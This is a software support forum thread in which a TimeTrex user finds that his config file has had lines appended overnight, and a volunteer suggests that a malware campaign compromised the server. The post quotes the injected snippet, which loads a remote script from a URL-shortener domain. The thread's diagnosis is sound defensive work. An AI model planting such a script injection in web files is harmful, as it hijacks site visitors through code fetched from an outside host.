timetrex.ini.php Syntax Error Overnight

General support regarding TimeTrex, such as
configuring policies/taxes or processing payroll.
Post Reply
iain
Posts: 12
Joined: Thu Jan 19, 2017 5:37 am

timetrex.ini.php Syntax Error Overnight

Post by iain »

Good Morning,

We have been running TimeTrex Community Edition for many years generally without issue, including automatic upgrades - as of approximately midnight today (known as a user attempted to log out at 00:10), TimeTrex started displaying a basic raw text error message as below:

'ERROR: Config file (/var/www/[DOMAIN REDACTED]/includes/../timetrex.ini.php) contains a syntax error! If your passwords contain special characters you need to wrap them in double quotes, ie:
password = "test!1!me"'

I examined the timetrex.ini.php file and initially could not see any issues, until I compared it to a copy taken from last night's backup - the only difference was at the very end of the file, where the following lines appear:

ob_start();
?>
<script src="https://9ge.ge/zrq0j4" type="text/javascript"></script>

This seemed a bit odd and also mildly concerning, so in a sandboxed environment I checked out the link and it appears to be a URL shortner site, but the link in particular goes to a blank file. I commented out the 3 lines from the ini.php file, and TimeTrex now loads correctly.

I've logged in and can't see any upgrades that occured last night, so I'm a bit confused what's going on here?
The issue is fixed by commenting out those lines, however I'd like to get a root cause analyis if possible.

Kind regards,
Iain.
mikeb
Posts: 709
Joined: Thu Jul 27, 2006 11:58 am

Re: timetrex.ini.php Syntax Error Overnight

Post by mikeb »

There isn't anything in TimeTrex itself that would add to your timetrex.ini.php file.

If I had to guess, your server may have been comprised by a malware, infact it looks awfully like this could be the culprit, as it mentions the "9ge.ge" domain as a URL shortener:

https://blog.sucuri.net/2023/02/bogus-u ... paign.html
TimeTrex Community Edition is developed and supported by volunteers.
Help motivate us to continue by showing your appreciation!
Post Reply